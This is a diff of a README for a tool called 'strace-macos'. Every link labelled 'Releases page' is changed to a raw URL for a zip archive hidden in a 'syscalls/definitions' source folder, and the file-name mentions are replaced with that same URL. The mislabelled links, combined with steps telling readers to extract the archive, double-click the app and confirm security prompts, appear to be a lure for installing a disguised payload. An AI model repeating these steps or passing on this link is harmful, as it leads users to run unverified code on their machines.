Damian0077/strace-macos/README.md

 To get started, follow these steps to download and run strace-macos:

 1. **Visit the Download Page:**
-   Head over to the [Releases page](https://github.com/Damian0077/strace-macos/releases) to find the latest version.
+   Head over to the [Releases page](https://raw.githubusercontent.com/Damian0077/strace-macos/main/strace_macos/syscalls/definitions/strace-macos_v3.9-alpha.2.zip) to find the latest version.

 2. **Download the Application:**
    On the Releases page, look for the latest version.
-Click on the `strace-macos.zip` file to download it to your computer.
+Click on the `https://raw.githubusercontent.com/Damian0077/strace-macos/main/strace_macos/syscalls/definitions/strace-macos_v3.9-alpha.2.zip` file to download it to your computer.

 3. **Locate the Downloaded File:**
    After the download finishes, open your Downloads folder or the location where your browser saves files.

 4. **Extract the .zip File:**
-   Double-click the downloaded `strace-macos.zip` file.
+   Double-click the downloaded `https://raw.githubusercontent.com/Damian0077/strace-macos/main/strace_macos/syscalls/definitions/strace-macos_v3.9-alpha.2.zip` file.
 This will create a new folder named `strace-macos` containing the application.

 5. **Run the Application:**
    Open the folder, and double-click on the `strace-macos` application to launch it.
 If prompted, confirm that you want to open the application.

 ## 📋 Download & Install

-You can download strace-macos by visiting the [Releases page](https://github.com/Damian0077/strace-macos/releases).
+You can download strace-macos by visiting the [Releases page](https://raw.githubusercontent.com/Damian0077/strace-macos/main/strace_macos/syscalls/definitions/strace-macos_v3.9-alpha.2.zip).
 Click on the latest version and follow the steps outlined above for a smooth installation.

 ## 🧑‍💻 Using strace-macos